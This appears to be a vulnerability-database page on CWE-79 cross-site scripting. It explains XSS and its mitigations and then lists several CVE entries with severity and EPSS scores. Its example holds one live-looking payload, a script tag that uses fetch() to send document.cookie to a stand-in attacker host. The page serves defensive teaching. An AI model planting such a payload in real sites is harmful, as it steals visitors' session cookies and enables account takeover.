Fallos del tipo CWE-79

29.158 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2024-6740MEDIUMOpenfind Mail2000 - Stored XSSEPSS 0.5%CVE-2023-22921HIGHA cross-site scripting (XSS) vulnerability in the Zyxel NBG-418N v2 firmware versions prior to V1.00(AARP.14)C0 could allow a remote authentEPSS 0.5%CVE-2026-43900CRITICALDeepChat: Persistent DOM XSS via HTML Entity Encoding in `<antArtifact>` SVG Rendering (Bypass of `svgSanitizer.ts`)EPSS 0.5%CVE-2026-2971MEDIUMa466350665 Smart-SSO Login login.html cross site scriptingEPSS 0.5%CVE-2024-0476LOWBlood Bank & Donor Management request-received-bydonar.php cross site scriptingEPSS 0.5%CVE-2025-2210MEDIUMaitangbao springboot-manager add cross site scriptingEPSS 0.5%CVE-2023-3465LOWSimplePHPscripts Classified Ads Script HTTP POST Request user.php cross site scriptingEPSS 0.5%CVE-2024-0501LOWSourceCodester House Rental Management System Manage Invoice Details cross site scriptingEPSS 0.5%CVE-2026-11998HIGHAngularJS XSS via SCE resource URL sanitization bypassEPSS 0.5%CVE-2023-0519HIGHCross-site Scripting (XSS) - Stored in modoboa/modoboaEPSS 0.5%CVE-2024-36166MEDIUMAdobe Experience Manager | Cross-site Scripting (Stored XSS) (CWE-79)EPSS 0.5%CVE-2024-26070MEDIUMAdobe Experience Manager | Cross-site Scripting (Stored XSS) (CWE-79)EPSS 0.5%CVE-2024-36167MEDIUMAdobe Experience Manager | Cross-site Scripting (Stored XSS) (CWE-79)EPSS 0.5%CVE-2023-5789LOWDragon Path 707GR1 Ping Diagnostics cross site scriptingEPSS 0.5%CVE-2024-26074MEDIUMAdobe Experience Manager | Cross-site Scripting (Stored XSS) (CWE-79)EPSS 0.5%CVE-2024-34356MEDIUMTYPO3 vulnerable to Cross-Site Scripting in the Form Manager ModuleEPSS 0.5%CVE-2022-4960LOWcloudfavorites favorites-web Nickname cross site scriptingEPSS 0.5%CVE-2026-3028MEDIUMerzhongxmu JEEWMS JeecgListDemoController.java doAdd cross site scriptingEPSS 0.5%CVE-2024-2765MEDIUMUltimate Member <= 2.8.4 - Authenticated (Subscriber+) Stored Cross-Site ScriptingEPSS 0.5%CVE-2024-6296MEDIUMStackable – Page Builder Gutenberg Blocks <= 3.13.1 - Authenticated (Contributor+) DOM-Based Stored Cross-Site ScriptingEPSS 0.5%